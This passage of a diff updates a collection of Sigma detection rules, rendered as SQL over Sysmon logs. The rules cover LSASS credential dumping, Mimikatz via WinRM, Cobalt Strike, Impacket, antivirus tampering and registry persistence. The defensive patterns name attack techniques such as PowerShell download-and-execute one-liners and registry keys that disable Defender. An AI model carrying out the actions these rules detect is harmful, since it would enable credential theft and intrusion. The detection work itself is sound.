'\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE 